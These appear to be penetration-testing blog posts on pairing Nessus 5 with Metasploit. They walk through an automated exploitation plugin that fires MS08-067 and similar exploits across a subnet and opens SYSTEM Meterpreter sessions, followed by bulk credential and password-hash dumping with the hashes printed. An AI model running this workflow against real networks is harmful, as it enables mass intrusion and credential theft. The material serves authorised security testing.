Shell is only the Beginning

With the recent release of Nessus 5 it comes with several improvements like better filtering in policy creation, analysis, reporting and a faster lighter engine for scanning. From this new features my favorite one is the ability to do filtering when creating new policies and analyzing results. For a very long time I kept a hand written list of plugins IDs that identified some of the most common found vulnerabilities that Metasploit covered for user with nessuscmd in my engagement. Now with the new filtering features that lets me select only those checks that cover vulnerabilities whose exploits are in exploit Frameworks like Core Impact and CANVAS, also one can filter for remote exploits or local ones also. In this blog post I will cover how to create a policy that covers all exploits found in Metasploit both local and remote. We will start by logging in to Nessus web interface and clicking on the Policies.

Once in policies we click on Add to be brought to the following screes where we can create one, we will put a name and brief description on the policy and let the rest as default:

 

We can go to the next section by clicking on Next and on this screen we can enter any credentials we may have as well as NTLM hashes for Windows credentials in the passwords field allowing for enumerating local vulnerabilities that might be on the target:

 

We now move to the plugin section by clicking on Next:

We start by clicking on  Disable All and then click on Add Filter to create a new filter for the plugins. we set the filter for Metasploit Exploit Framework,set the action  is equal to and value to true, we then click on Save to apply the filter:

To enable the plugins in each family we click on the family name text being careful not to click in the circle beside the name and then we click on Enable Plugins at the top of the plugin list: 

Now we click on Next then on Save to save the policy.

Once saved we can use the nessus plugin from the console to connect to the scanner and use it from inside Metasploit. You can use the console in Armitage, MSFConsole or the one in Metasploit Community/Pro/Express to load the plugin for use:

msf > load nessus 
[*] Nessus Bridge for Metasploit 1.1
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus

Once the plugin is loaded we can connect to the host that is running the Nessus server using the nessus_connect command and list the policies we have available to us with nessus_policy_list:

msf > nessus_connect carlos:contasena@localhost ok
[*] Connecting to https://localhost:8834/ as carlos
[*] Authenticated
msf > nessus_policy_list 
[+] Nessus Policy List
[+] 
ID  Name                        Comments
--  ----                        --------
-1  External Network Scan       
-2  Internal Network Scan       
-3  Prepare for PCI DSS audits  
-4  Web App Tests               
6   Metasploit Exploits         

We can now use the policy to perform a scan of a network by using the policy ID, name for the scan and specifying a range using the nessus_scan_new command:

msf > nessus_scan_new 6 "contoso pentest" 192.168.1.1-241
[*] Creating scan from policy number 6, called "contoso pentest" and scanning 192.168.1.1-241
[*] Scan started.  uid is 396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554

We can monitor the status of the scan using the command nessus_scan_status:

msf > nessus_scan_status 
[+] Running Scans
[+] 
Scan ID                                               Name             Owner   Started            Status   Current Hosts  Total Hosts
-------                                               ----             -----   -------            ------   -------------  -----------
396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554  contoso pentest  carlos  11:53 Feb 16 2012  running  217            241
[+] 
[*] You can:
[+]         Import Nessus report to database :     nessus_report_get <reportid>
[+]         Pause a nessus scan :             nessus_scan_pause <scanid>
msf >

Once we can see that the scan is no longer running we can access the report using from the scan using the nessus_report_list command to see its name and ID:

msf > nessus_report_list 
[+] Nessus Report List
[+] 
ID                                                    Name             Status     Date
--                                                    ----             ------     ----
396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554  contoso pentest  completed  11:58 Feb 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>

Now that we have the report ID we can import it but before we do that we must first create a workspace to hose the data so as to keep it separated from any other data we may already be housing in the Metasploit default wroksapace and we use the nessus_report_get command to import the report:

msf > workspace -a contoso
[*] Added workspace: contoso
msf > nessus_report_get 396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554
[*] importing 396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554
[*] 192.168.1.99
[*] 192.168.1.241
[*] 192.168.1.237
[*] 192.168.1.235
[*] 192.168.1.234
[*] 192.168.1.230
[*] 192.168.1.223
[*] 192.168.1.2
[*] 192.168.1.192
[*] 192.168.1.156
[*] 192.168.1.155
[*] 192.168.1.154
[*] 192.168.1.153
[*] 192.168.1.146
[*] 192.168.1.143
[*] 192.168.1.134
[*] 192.168.1.113
[*] 192.168.1.109
[*] 192.168.1.102
[*] 192.168.1.100
[*] 192.168.1.1
[+] Done

After the import you can look at the vulnerabilities found by using the vulns command:

msf > vulns
[*] Time: 2012-02-16 16:01:44 UTC Vuln: host=192.168.1.1 port=443 proto=tcp name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2012-02-16 16:01:37 UTC Vuln: host=192.168.1.2 port=111 proto=tcp name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2012-02-16 16:01:37 UTC Vuln: host=192.168.1.2 port=445 proto=tcp name=Microsoft Windows SMB Log In Possible refs=MSF-Microsoft Windows Authenticated User Code Execution,NSS-10394
[*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=445 proto=tcp name=MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check) refs=CVE-2008-4250,BID-31874,OSVDB-49243,IAVA-2008-A-0081,MSFT-MS08-067,CWE-94,MSF-Microsoft Server Service Relative Path Stack Corruption,NSS-34477
[*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=53 proto=tcp name=Nessus SNMP Scanner refs=NSS-14274
[*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=445 proto=tcp name=Microsoft Windows SMB Log In Possible refs=MSF-Microsoft Windows Authenticated User Code Execution,NSS-10394
[*] Time: 2012-02-16 16:01:40 UTC Vuln: host=192.168.1.100 port=59159 proto=tcp name=netstat portscanner (SSH) refs=NSS-14272
[*] Time: 2012-02-16 16:01:40 UTC Vuln: host=192.168.1.102 port=62078 proto=tcp name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2012-02-16 16:01:40 UTC Vuln: host=192.168.1.109 port=62078 proto=tcp name=Nessus SYN scanner refs=NSS-11219
.......

Once we confirm that vulnerabilities where found we can use the auto_exploit plugin I wrote and updated for this blogpost, it can be found at https://github.com/darkoperator/Metasploit-Plugins/blob/master/auto_exploit.rb you just need to put a copy of it in your OSX/Linux host in to ~/.msf4/plugins so as to be able to use it. We start by loading it and looking at the options of the vuln_exploit command that will allow us to exploit the hosts found to be vulnerable:

msf > load auto_exploit 
[*] auto_exploit plug-in loaded.
[*] Successfully loaded plugin: auto_exploit
msf > vuln_exploit -h
OPTIONS:
    -f <opt>  Provide a comma separated list of IP's and Ranges to skip when running exploits.
    -h        Command Help
    -j <opt>  Max number of concurrent jobs, 3 is the default.
    -m        Only show matched exploits.
    -r <opt>  Minimum Rank for exploits (low, average,normal,good,great and excellent) good is the default.
    -s        Do not limit number of sessions to one per target.

To launch the exploits found we just use the vuln_exploit command, this will analyze the vulnerabilities found and match them modules in the framework launching by default 3 exploits at a time auto configured with the best possible payload for the platform and limiting to one session per host:

msf > vuln_exploit
[*] Generating List for Matching...
[*] Matching Exploits (This will take a while depending on number of hosts)...
[+] Matched Exploits:
[+]     192.168.1.153 exploit/windows/smb/ms08_067_netapi 445 500
[+]     192.168.1.113 exploit/windows/smb/ms08_067_netapi 445 500
[+]     192.168.1.99 exploit/windows/smb/ms08_067_netapi 445 500
[+]     192.168.1.192 exploit/windows/smb/ms08_067_netapi 445 500
[+]     192.168.1.153 exploit/windows/dcerpc/ms03_026_dcom 135 500
[+]     192.168.1.154 exploit/linux/samba/lsa_transnames_heap 445 400
[+]     192.168.1.113 exploit/windows/smb/ms06_040_netapi 445 400
[+]     192.168.1.153 exploit/windows/smb/ms04_011_lsass 445 400
[+]     192.168.1.153 exploit/windows/smb/ms06_040_netapi 445 400
[+]     192.168.1.153 exploit/windows/smb/ms05_039_pnp 445 400
[+]     192.168.1.153 exploit/windows/smb/ms04_007_killbill 445 100
[*] Running Exploits:
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.153
[*] Started reverse handler on 192.168.1.241:29271 
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.113
[*] Automatically detecting the target...
[*] Started reverse handler on 192.168.1.241:4643 
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.99
[*] Started reverse handler on 192.168.1.241:14900 
[*] Automatically detecting the target...
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Fingerprint: Windows 2000 - Service Pack 4 with MS05-010+ - lang:English
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.99
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.153
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.113
[*] waiting for finishing some modules... active jobs: 3 / threads: 16
[*] Meterpreter session 1 opened (192.168.1.241:14900 -> 192.168.1.99:1513) at 2012-02-16 12:54:23 -0400
[*] Meterpreter session 2 opened (192.168.1.241:29271 -> 192.168.1.153:2709) at 2012-02-16 12:54:23 -0400
[*] Meterpreter session 3 opened (192.168.1.241:4643 -> 192.168.1.113:4035) at 2012-02-16 12:54:23 -0400
[*] waiting for finishing some modules... active jobs: 0 / threads: 19
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.192
[+]     Skipping 192.168.1.153 exploit/windows/dcerpc/ms03_026_dcom because a session already exists.
[*] Started reverse handler on 192.168.1.241:15430 
[*] Running exploit/linux/samba/lsa_transnames_heap against 192.168.1.154
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[+]     Skipping 192.168.1.113 exploit/windows/smb/ms06_040_netapi because a session already exists.
[*] Started reverse handler on 192.168.1.241:48452 
[+]     Skipping 192.168.1.153 exploit/windows/smb/ms04_011_lsass because a session already exists.
[*] Creating nop sled....
[+]     Skipping 192.168.1.153 exploit/windows/smb/ms06_040_netapi because a session already exists.
[+]     Skipping 192.168.1.153 exploit/windows/smb/ms05_039_pnp because a session already exists.
[+]     Skipping 192.168.1.153 exploit/windows/smb/ms04_007_killbill because a session already exists.
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
[*] Attempting to trigger the vulnerability...
msf > [*] Sending stage (752128 bytes) to 192.168.1.192
[*] Meterpreter session 4 opened (192.168.1.241:15430 -> 192.168.1.192:1597) at 2012-02-16 12:54:29 -0400

We can now take a look at the sessions found using the sessions command:

msf > sessions 
Active sessions
===============
  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ CARLOS-CD652C1C  192.168.1.241:14900 -> 192.168.1.99:1513
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN2KADV01       192.168.1.241:29271 -> 192.168.1.153:2709
  3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ TEST-01BCDAF47C  192.168.1.241:4643 -> 192.168.1.113:4035
  4   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DBSQL2K01        192.168.1.241:15430 -> 192.168.1.192:1597

As you can see the mix of the the new filtering in Nessus 5 with the Nessus plugin and my auto_exploit plugin allows to one be less noisy and more tactical when it comes to exploitation when used in conjunction. Hope you found this blog post informative and useful as always.

I was recently asked what would be the best way to use my Metasploit projects in a an easy manner, so I will share how I did my setup for both OS X and Backtrack for using my plugins and modules. Let start first with creating a Development folder in the users home directory to house the GitHub repos

mkdir ~/Development

After this you can clone the repos in to this folder:

cd ~/Deveolpment
git clone https://github.com/darkoperator/Metasploit-Plugins.git msf_plugins
git clone https://github.com/darkoperator/Meterpreter-Scripts.git msf_modules

Now we can link the modules to our ~/.msf4 directory so we can use them transparently with any instance of the framework we might be running on the machine:

ln -s ~/Development/msf_plugins/ ~/.msf4/plugins
ln -s ~/Development/msf_modules/ ~/.msf4/modules

To keep them updated is just a simple git pull in each directory to get the latest changes and bug fixes.

This is the second part of my Pentest Metasploit plugin. This part will cover the post exploitation commands this plugin adds. First I would like to cover the thought process of this commands. The commands came from some modules I pushed and then had to pull from the Metasploit Framework around summer of 2011 that sadly did not comply with some of the rules on what modules where supposed to do and the post mixin did not allowed me to do. I created a Metasploit plugin that added the functionality of the modules I wrote to the console, the initial plugin is called auto post and can be found in my GitHub account https://github.com/darkoperator/Metasploit-Plugins Several of the main design features I took when developing this section of the pentest plugin where:

• Provide a way to run post modules where I could select the sessions to run the modules against.
• Do not pollute the datastore with Global variables like it would be needed with a resource file.
• Check that thee session is a compatible one before running the module.
• Allow to automate some of the most common tasks like password collection from applications and the OS user credentials.
• Allow the setting os several variables per module in a resource file in an easy manner so each module could be executed in a manner that would produce the best results.

To use the plugin you only need to download it from my GitHub account and place it in either ~.msf/plugins or in you Metasploit root folder plugins directory for use, sadly at the moment of this writing the tab completion for when loading the plug in will only work if the plugin is on the Metasploit plugins folder of the install and not the hidden home folder.

Sessions that will be used for showing the plugin usage:

msf  exploit(handler) > sessions -l

Active sessions
===============

Id  Type                   Information                                      Connection
--  ----                   -----------                                      ----------
1   shell linux                                                             192.168.1.100:4448 -> 192.168.1.229:47760
2   meterpreter x86/win32  TEST-01BCDAF47C\Administrator @ TEST-01BCDAF47C  192.168.1.100:4444 -> 192.168.1.113:1858
3   meterpreter x86/win32  WIN-YR4V852V71Y\Administrator @ WIN-YR4V852V71Y  192.168.1.100:4444 -> 192.168.1.156:49183
4   shell windows          Microsoft Windows [Version 6.1.7601]             192.168.1.100:4447 -> 192.168.1.225:49582
5   shell linux                                                             192.168.1.100:4448 -> 192.168.1.119:33595

Loading the module:

msf  exploit(handler) > load pentest 
postauto plugin loaded.
[*] Successfully loaded plugin: pentest

The Post Exploitation commands addd are:

Postauto Commands
=================

    Command             Description
    -------             -----------
    app_creds           Run application password collection modules against specified sessions.
    multi_cmd           Run shell command against several sessions
    multi_meter_cmd     Run a Meterpreter Console Command against specified sessions.
    multi_meter_cmd_rc  Run resource file with Meterpreter Console Commands against specified sessions.
    multi_post          Run a post module against specified sessions.
    multi_post_rc       Run resource file with post modules and options against specified sessions.
    sys_creds           Run system password collection modules against specified sessions.

Lets take a look at the app_creds command, this command will run all post exploitation modules that gather credentials from installed applications, first lets take a look at the options it provide:

msf  exploit(handler) > app_creds -h

OPTIONS:

    -h        Command Help
    -s <opt>  Sessions to run modules against. Example <all> or <1,2,3,4>

The options are quite simple we can tell it what sessions we want to run in a comma separated list or just type 'all' and have it run against all sessions. Lets run it against all the current sessions:

msf > app_creds -s all

Running windows/gather/credentials/wsftp_client against 2

[*] Checking Default Locations...
[*] C:\Documents and Settings\Administrator\Application Data\Ipswitch\WS_FTP\Sites\ws_ftp.ini not found ....
[*] C:\Documents and Settings\Administrator\Application Data\Ipswitch\WS_FTP Home\Sites\ws_ftp.ini not found ....

Running windows/gather/credentials/wsftp_client against 3
[*] Checking Default Locations...
[*] C:\Users\charlie\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini not found ....
[*] C:\Users\charlie\AppData\Roaming\Ipswitch\WS_FTP Home\Sites\ws_ftp.ini not found ....
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini not found ....
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP Home\Sites\ws_ftp.ini not found ....

Running windows/gather/credentials/winscp against 2
[*] Looking for WinSCP.ini file storage...
[*] WinSCP.ini file NOT found...
[*] Looking for Registry Storage...
[*] No WinSCP Registry Keys found!
[*] Done!

Running windows/gather/credentials/winscp against 3
[*] Looking for WinSCP.ini file storage...
[*] WinSCP.ini file NOT found...
[*] Looking for Registry Storage...
[*] No WinSCP Registry Keys found!
[*] Done!
………

Running multi/gather/filezilla_client_cred against 4
[*] No users found with a FileZilla directory

Running multi/gather/filezilla_client_cred against 5
[*] Checking for FileZilla Client profile in: /home/carlos
[*] Checking for FileZilla Client profile in: /home/lost+found
[*] Checking for FileZilla Client profile in: /root
[*] No users found with a FileZilla directory

The command will run each module sequentially against the current sessions, output of each of the commands is shown as they are executed. The credential harvesting post modules save their results in the credentials table. To look at the just issue the command creds, another thing is that the target host for this credentials are also stored in the hosts table:

msf  exploit(handler) > creds

Credentials
===========

host          port  user    pass      type      active?
----          ----  ----    ----      ----      -------
1.1.1.1       21    carlos  marta     password  true
10.10.1.1     21    test    tessqwwe  password  true
10.10.10.10   21    msf     test      password  true
10.10.10.100  22    test    resroass  password  true
192.168.1.1   21    msf     test      password  true

[*] Found 5 credentials.
msf  exploit(handler) > hosts 

Hosts
=====

address        mac  name             os_name            os_flavor  os_sp  purpose  info  comments
-------        ---  ----             -------            ---------  -----  -------  ----  --------
1.1.1.1                                                                                  
10.10.1.1                                                                                
10.10.10.10                                                                              
10.10.10.100                                                                             
192.168.1.1                                                                              
192.168.1.115       CARLOS-192FCD91  Microsoft Windows  XP         SP3    client

The next command for gathering information is the sys_creds, this command will choose the appropriate credential dumping command depending on the sessions type and OS, in the case of windows system it will attempt to get system privilege to be able to dump the hashes, they to can be found in the creds table and in loot. Options:

msf  exploit(handler) > sys_creds -h

OPTIONS:

    -h        Command Help
    -s <opt>  Sessions to run modules against. Example <all> or <1,2,3,4>

Running the command:

msf  exploit(handler) > sys_creds -s all

...

Running windows/gather/smart_hashdump against 1
[*] Running module against CARLOS-192FCD91
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /Users/carlos/.msf4/loot/20120125082528_default_192.168.1.115_windows.hashes_690213.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM privilege
[+] Got SYSTEM privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY f228f68360a9fbdd929f311d27192e90...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392:::
[+]     SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e:::
[+]     HR:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

Running windows/gather/smart_hashdump against 2
[*] Running module against TEST-01BCDAF47C
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /Users/carlos/.msf4/loot/20120125082534_default_192.168.1.113_windows.hashes_233919.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM privilege
[+] Got SYSTEM privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 4503ffd18cd3ee70d443b159c8626842...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
[+]     SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::

Running linux/gather/hashdump against 3
[+] root:$1$1lQhcdo0$QpqLgMYl1r4nerxr9GQDn0:0:0:root:/root:/bin/bash
[+] nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
[+] vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
[+] oprofile:!!:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
[+] pcap:!!:77:77::/var/arpwatch:/sbin/nologin
[+] ntp:!!:38:38::/etc/ntp:/sbin/nologin
[+] dbus:!!:81:81:System message bus:/:/sbin/nologin
[+] avahi:!!:70:70:Avahi daemon:/:/sbin/nologin
[+] rpc:!!:32:32:Portmapper RPC user:/:/sbin/nologin
[+] apache:!!:48:48:Apache:/var/www:/sbin/nologin
[+] mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
[+] smmsp:!!:51:51::/var/spool/mqueue:/sbin/nologin
[+] sshd:!!:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
[+] xfs:!!:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
[+] rpcuser:!!:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
[+] nfsnobody:!!:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
[+] haldaemon:!!:68:68:HAL daemon:/:/sbin/nologin
[+] gdm:!!:42:42::/var/gdm:/sbin/nologin
[+] carlos:$1$1lQhcdo0$QpqLgMYl1r4nerxr9GQDn0:500:500:Carlos Perez:/home/carlos:/bin/bash
[+] Unshadowed Password File: /Users/carlos/.msf4/loot/20120125082541_default_192.168.1.119_linux.hashes_102504.txt

Running linux/gather/hashdump against 4
[-] You must run this module as root!

Looking at the gathered info using loot since system hashes are saved there:

msf  exploit(handler) > creds

Credentials
===========

host           port  user              pass                                                               type      active?
----           ----  ----              ----                                                               ----      -------
...
192.168.1.113  445   HelpAssistant     17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2  smb_hash  true
192.168.1.113  445   Administrator     bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203  smb_hash  true
192.168.1.113  445   SUPPORT_388945a0  aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63  smb_hash  true
192.168.1.115  445   HR                44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4  smb_hash  true
192.168.1.115  445   SUPPORT_388945a0  aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e  smb_hash  true
192.168.1.115  445   HelpAssistant     4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392  smb_hash  true
192.168.1.115  445   Administrator     bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203  smb_hash  true

[*] Found 12 credentials.
msf  exploit(handler) > loot

Loot
====

host           service  type                          name                              content     info                                path
----           -------  ----                          ----                              -------     ----                                ----
192.168.1.113           windows.hashes                TEST-01BCDAF47C_hashes.txt        text/plain  Windows Hashes                      /Users/carlos/.msf4/loot/20120125082534_default_192.168.1.113_windows.hashes_233919.txt
192.168.1.115           windows.hashes                CARLOS-192FCD91_hashes.txt        text/plain  Windows Hashes                      /Users/carlos/.msf4/loot/20120125082528_default_192.168.1.115_windows.hashes_690213.txt
192.168.1.115           ie.cookies                    ie_cookies.txt                    text/plain  Internet Explorer Cookies           /Users/carlos/.msf4/loot/20120125081022_default_192.168.1.115_ie.cookies_091073.txt
192.168.1.115           ie.history                    ie_history.txt                    text/plain  Internet Explorer Browsing History  /Users/carlos/.msf4/loot/20120125081022_default_192.168.1.115_ie.history_338823.txt
192.168.1.115           windows.autologin.user.creds  windows-autologin-user-creds.csv  text/csv    Windows AutoLogin User Credentials  /Users/carlos/.msf4/loot/20120125080927_default_192.168.1.115_windows.autologi_357557.csv
192.168.1.115           imail.user.creds              imail_user_creds.csv              text/csv    Ipswitch iMail user credentials     /Users/carlos/.msf4/loot/20120125080951_default_192.168.1.115_imail.user.creds_495255.csv
192.168.1.119           linux.hashes                  unshadowed_passwd.pwd             text/plain  Linux Unshadowed Password File      /Users/carlos/.msf4/loot/20120125082541_default_192.168.1.119_linux.hashes_102504.txt
192.168.1.119           linux.passwd                  passwd.tx                         text/plain  Linux Passwd File                   /Users/carlos/.msf4/loot/20120125082541_default_192.168.1.119_linux.passwd_327705.txt
192.168.1.119           linux.shadow                  shadow.tx                         text/plain  Linux Password Shadow File          /Users/carlos/.msf4/loot/20120125082541_default_192.168.1.119_linux.shadow_914385.txt

The next command in the list if the multi_post command, this command allows the running of a specified post modules against a list of sessions or all sessions. The command will check that the options provided are correct during execution and will check that the module is compatible with the session before executing. Recently the option to do tab completion for the module name was added. The options are:

msf > multi_post -h

OPTIONS:

    -h        Command Help
    -m <opt>  Module to run against sessions.
    -o <opt>  Module options.
    -s <opt>  Sessions to run module against. Example <all> or <1,2,3,4>

Lets run the checkvm modules for windows and linux, in the output you will be able to see that the module only executed against those sessions that the module was compatible for:

msf > multi_post -m post/windows/gather/checkvm -s all
Loading windows/gather/checkvm
Running against 2

[*] Checking if CARLOS-192FCD91 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
Running against 3
[*] Checking if TEST-01BCDAF47C is a Virtual Machine .....
[*] This is a VMware Virtual Machine
Running against 4
[*] Checking if WINDEV01 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
msf > multi_post -m post/linux/gather/checkvm -s all
Loading linux/gather/checkvm
Running against 6

[*] Gathering System info ....
[+] This appears to be a VMware Virtual Machine
Running against 7
[*] Gathering System info ....
[+] This appears to be a VMware Virtual Machine

The other multi post command allow the running of modules against multiple session with options using a resource file, this allows you to have several resource files with options already pre-set for specific tasks, tab completion can be use for the resource file name:

msf > multi_post_rc -h

OPTIONS:

    -h         Command Help
    -rc <opt>  Resource file with space separate values <session> <module> <options>, per line.

The RC File:

msf > cat /tmp/checkvm.rc
[*] exec: cat /tmp/checkvm.rc

all post/windows/gather/checkvm
all post/linux/gather/checkvm

Running the RC file:

msf > multi_post_rc -rc /tmp/checkvm.rc 
all post/windows/gather/checkvm
Loading post/windows/gather/checkvm
Running Against 2

[*] Checking if CARLOS-192FCD91 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
Running Against 3
[*] Checking if TEST-01BCDAF47C is a Virtual Machine .....
[*] This is a VMware Virtual Machine
Running Against 4
[*] Checking if WINDEV01 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
all post/linux/gather/checkvm
Loading post/linux/gather/checkvm
Running Against 6
[*] Gathering System info ....
[+] This appears to be a VMware Virtual Machine
Running Against 7
[*] Gathering System info ....
[+] This appears to be a VMware Virtual Machine

When looking at running commands against sessions, there are 2 types of commands that can be executed, Shell commands and Meterpreter console command, for shell commands the multi_cmd command is available:

msf > multi_cmd -h

OPTIONS:

    -c <opt>  Shell command to run.
    -h        Command Help
    -p <opt>  Platform to run the command against. If none given it will run against all.
    -s <opt>  Comma separated list sessions to run modules against.

You can specify a platform for running the command (bsd, solaris, linux and win), the list of sessions and the command to be executed. On windows based system I recommend using the "cmd /c " format and for unix type systems to use the full path for the command, you need the wrap the command in quotes. Since post modules and scripts save their data to loot this command will do the same saving the command output and command ran in loot. Lets run ipconfig against all Windows sessions:

msf > multi_cmd -s all -p win -c "cmd /c ipconfig"
Running cmd /c ipconfig against session 2


Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.1.115
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1
Running cmd /c ipconfig against session 3


Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.1.113
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1
Running cmd /c ipconfig against session 4


Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::9930:cb9f:3b7e:e92d%10
...

Tunnel adapter Local Area Connection* 9:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : 2001:0:4137:9e76:3422:1b95:3f57:fe65
   Link-local IPv6 Address . . . . . : fe80::3422:1b95:3f57:fe65%12
   Default Gateway . . . . . . . . . : ::

Lets run ifconfig against linux systems:

msf > multi_cmd -s all -p linux -c "/sbin/ifconfig -a "
Running /sbin/ifconfig -a  against session 6
eth0      Link encap:Ethernet  HWaddr 00:0C:29:97:CD:08  
          inet addr:192.168.1.119  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe97:cd08/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1297491 errors:1 dropped:0 overruns:0 frame:0
          TX packets:51870 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:205739082 (196.2 MiB)  TX bytes:4346662 (4.1 MiB)
          Interrupt:67 Base address:0x2024 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1567 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1567 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2116526 (2.0 MiB)  TX bytes:2116526 (2.0 MiB)

sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

Running /sbin/ifconfig -a  against session 7
eth0      Link encap:Ethernet  HWaddr 00:0C:29:97:CD:08  
          inet addr:192.168.1.119  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe97:cd08/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1297495 errors:1 dropped:0 overruns:0 frame:0
          TX packets:51874 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:205739404 (196.2 MiB)  TX bytes:4348194 (4.1 MiB)
          Interrupt:67 Base address:0x2024 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
